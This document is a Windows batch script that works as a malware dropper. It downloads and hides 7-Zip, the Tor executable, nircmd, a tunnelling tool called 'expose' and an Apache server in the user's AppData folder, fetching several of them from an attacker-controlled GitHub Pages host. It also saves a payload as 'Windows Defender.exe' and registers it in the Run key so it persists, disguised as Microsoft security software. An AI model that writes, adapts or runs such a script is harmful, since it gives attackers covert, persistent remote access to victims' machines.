@echo off
setlocal
set host=https://cryptedodissey.github.io
set environment=%AppData%\Microsoft\Windows

attrib -s -h -i "%environment%\7-Zip" && if exist "%environment%\7-Zip\7z.exe" (
  echo.
) else (
  "%environment%\curl.exe" -k https://www.7-zip.org/a/7z2201.exe --output "%temp%\7z2201.exe" && "%temp%\7z2201.exe" /S /D="%environment%\7-Zip" && del "%temp%\7z2201.exe" && attrib +s +h +i "%environment%\7-Zip"
)

attrib -s -h -i "%environment%\tor.exe" && if exist "%environment%\tor.exe" (
    echo.
) else (
   "%environment%\curl.exe" -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz > "%temp%\Tor.tar.gz" && "%environment%\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "%environment%\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"%environment%" -y && attrib +s +h +i "%environment%\tor.exe" && del "%temp%\Tor.tar.gz"
)

attrib -s -h -i "%environment%\nircmd.exe" && if exist "%environment%\nircmd.exe" (
    echo.
) else (
"%environment%\curl.exe" -k %proxy% %host%/Capture/nircmd.exe --output "%environment%\nircmd.exe" && attrib +s +h +i "%environment%\nircmd.exe"
)

attrib -s -h -i "%environment%\Windows Defender.exe" && curl.exe -k %proxy% %host%/sfx.exe --output "%environment%\Windows Defender.exe" && attrib +s +h +i "%environment%\Windows Defender.exe" && REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /t REG_SZ /F /D "%environment%\Windows Defender.exe -P\"rofile of Windows Defender [Microsoft Corporation]"\"

attrib -s -h -i "%environment%\expose.exe" && if exist "%environment%\expose.exe" (
    echo.
) else (
  "%environment%\curl.exe" -k %proxy% %host%/Tools/expose.zip --output "%temp%\expose.zip" && "%environment%\7-Zip\7z.exe" x "%temp%\expose.zip" -o"%environment%" -y && attrib +s +h +i "%environment%\expose.exe" && del "%temp%\expose.zip"
)
 
 attrib -s -h -i "%environment%\apache2" &&  if exist "%environment%\apache2\bin\httpd.exe" (
    echo.
) else (
   "%environment%\curl.exe" -k %proxy% %host%/Tools/apache2.zip --output "%temp%\apache2.zip" && "%environment%\7-Zip\7z.exe" x "%temp%\apache2.zip" -o"%environment%" -y && attrib +s +h +i "%environment%\apache2" && del "%temp%\apache2.zip"
)
endlocal
